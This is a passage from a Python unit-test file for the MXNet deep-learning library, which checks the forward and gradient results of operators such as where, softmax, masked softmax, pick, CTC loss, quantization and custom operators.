assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert(expect_out.all() == out.all())
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)], rtol=1e-3, atol=1e-4)
check_numeric_gradient(sym, [data], rtol=1e-1, atol=1e-2)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1._bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_environment('MXNET_SAFE_ACCUMULATION', '1')
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
def np_softmax(x, axis=-1, temperature=1.0, normalize=True):
if normalize:
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x / temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def np_masked_softmax(data, mask, axis=-1, temperature=1.0, normalize=True):
neg = -1e18
if data.dtype == np.float16:
neg = -1e4
temp = np.where(mask, data, neg)
result = np_softmax(temp, axis=axis,
temperature=temperature,
normalize=normalize) * mask
return result
def np_masked_softmax_grad(out, grad_out, axis=-1, temperature=1.0):
temp = np.sum(out * grad_out, axis=axis, keepdims=True)
result = out * (grad_out - temp) / temperature
return result
def np_masked_log_softmax_grad(out, grad_out, mask, axis=-1, temperature=1.0):
grad_out = np.where(mask, grad_out, 0)
temp = np.sum(grad_out, axis=axis, keepdims=True)
result = (grad_out - np.exp(out) * temp) / temperature
result = np.where(mask, result, 0)
return result
@pytest.mark.parametrize('dtype', [np.float16, np.float32, np.float64])
@pytest.mark.parametrize('axis', [0, -1, -2, -3])
@pytest.mark.parametrize('ndims', [3, 4, 5])
@pytest.mark.parametrize('n_broadcast_axis', [0, 1, 2])
@pytest.mark.parametrize('temperature', [1, 5, 9 ,11])
@pytest.mark.parametrize('normalize', [True])
@pytest.mark.flaky
def test_masked_softmax(dtype, axis, ndims, n_broadcast_axis, temperature, normalize):
n_broadcast_axis = min(n_broadcast_axis, ndims - 1)
shape = rand_shape_nd(ndims, dim=10)
mx_data = rand_ndarray(shape, dtype=dtype)
bcst_dims = []
while len(bcst_dims) < n_broadcast_axis:
ax = np.random.randint(0, ndims)
if ax not in bcst_dims :
bcst_dims.append(ax)
shape_mask = list(shape)
for i in bcst_dims:
shape_mask[i] = 1
np_data = mx_data.asnumpy()
np_mask = np.random.randint(0, 2, shape_mask)
mx_mask = mx.nd.array(np_mask, dtype=np.bool)
mx_grad = rand_ndarray(shape, dtype=dtype)
np_grad = mx_grad.asnumpy()
np_out = np_masked_softmax(np_data, np_mask, axis,
temperature, normalize)
np_grad_out = np_masked_softmax_grad(np_out, np_grad,
axis, temperature)
data = mx.sym.Variable("data")
mask = mx.sym.Variable("mask")
mx_sym = mx.sym.masked_softmax(data=data, mask=mask,
temperature=temperature, axis=axis,
normalize=normalize)
location = {"data": mx_data, "mask": mx_mask}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol,
dtype="asnumpy", equal_nan=True)
check_symbolic_backward(mx_sym, location, [mx_grad],
[np_grad_out, np.zeros(shape, dtype=np.bool)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3,
dtype="asnumpy", equal_nan=True)
@pytest.mark.parametrize('dtype', ['float32'])
@pytest.mark.parametrize('ndims', [1, 2, 3, 4, 5])
def test_masked_log_softmax(dtype, ndims):
shape = np.random.randint(1, 5, size=ndims)
axis = np.random.randint(0, ndims)
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_mask = np.random.randint(0, 2, shape)
mx_mask = mx.nd.array(np_mask, dtype=np.bool)
mx_grad = rand_ndarray(shape, dtype=dtype)
np_grad = mx_grad.asnumpy()
np_out = np.log(np_masked_softmax(np_data, np_mask, axis)+1e-20) * np_mask
np_out_inf = np.where(np_mask, np_out, -np.inf)
np_grad_out = np_masked_log_softmax_grad(np_out, np_grad, np_mask, axis)
data = mx.sym.Variable("data")
mask = mx.sym.Variable("mask")
mx_sym = mx.sym.masked_log_softmax(data=data, mask=mask, axis=axis-ndims)
location = {"data": mx_data, "mask": mx_mask}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out_inf], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [mx_grad],
[np_grad_out, np.zeros(shape, dtype=np.bool)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3,
dtype="asnumpy", equal_nan=True)
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc._bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0].copy()
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest, outTrain)
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
# helper function to identify inputs likely to fail check_numeric_gradient tol test
# due to finite difference method inaccuracies or function discontuities at the origin
def bad_input_finder(f, f_grad, dtype):
eps = default_numeric_eps()[np.dtype(dtype)]
rtol = default_rtols()[np.dtype(dtype)]
def expected_relative_error(x):
fd_gradient = (f(x+eps/2) - f(x-eps/2)) / eps
return abs(fd_gradient/f_grad(x) - 1)
def is_fd_problem_input(x):
return abs(x) < eps/2 or expected_relative_error(x) > rtol
return np.vectorize(is_fd_problem_input)
def test_reciprocal_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.reciprocal,
lambda x: -np.reciprocal(x)**2, np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
def test_cbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.cbrt,
lambda x: 1./(3 * np.cbrt(x)**2), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
def test_rcbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(lambda x: 1./np.cbrt(x),
lambda x: -1./(3 * np.cbrt(x)**4), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
